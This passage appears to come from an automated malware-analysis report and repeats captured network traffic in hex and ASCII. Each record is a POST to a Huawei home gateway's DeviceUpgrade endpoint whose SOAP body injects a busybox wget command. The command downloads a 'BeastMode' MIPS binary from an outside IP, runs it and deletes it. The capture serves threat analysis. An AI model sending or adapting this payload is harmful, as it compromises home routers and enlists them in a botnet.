xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget 